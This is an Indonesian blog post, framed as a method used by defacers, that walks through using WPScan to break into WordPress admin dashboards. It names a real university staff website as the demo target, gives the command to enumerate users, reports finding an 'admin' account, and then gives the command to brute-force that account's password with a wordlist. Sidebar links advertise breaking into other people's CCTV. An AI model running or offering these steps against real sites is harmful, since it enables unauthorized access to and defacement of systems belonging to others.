Scan & BruteForce CMS Wordpress Using WPScan - Fredy Blog

Assalamuallaikum wr.wb


Siang bro, di postingan kali ini gw mau share cara yg sering di pake para defacer, untuk masuk ke Dashboard  admin cms wordpress. tools yg gw pake WPScan, WPScan adalah tools open source yg digunakan untuk pentester mencari celah pada CMS Wordpres. Ok langsung saja , setp by stepnya :

Related:Tutorial Jebol CCTV Orang Lain

jalankan terminal , buka wpscan di /opt/wpscan/wpscan.rb

[+] sudo ruby wpscan.rb -h

untuk DEMO targetnya gw kasih => http://haryono.staff.ugm.ac.id

Related:Tutorial Jebol CCTV Orang Lain

masuikn perintah

[+] sudo wpscan -u URL-TARGET --enumerate u

Related:Scan Website Using Whatweb

banyak perintah yg lain seperti: p ; t ; u ; & tt.  kali ini gw coba pake "Users"

# user : admin .   nah kalo udh ketemu usernamenya sekarang kita brute force pake wordlist yg kita punya ^_^ , masukan perintah :

Related:Scan Website Using Whatweb

[+] sudo ruby wpscan.rb -u URLTARGET --wordlist /letak/wordlist/kamu.txt --username admin

DONE ,  proses bruteforce password admin sedang berjalan, tungguin yg sabar bro :p .


Sekian Tutorial dari saya, semoga bermanfaat bagi siapa saja yg mau belajar, terimakasih sudah berkunjung ^_^ .  Arigatou Senpai ^_^ .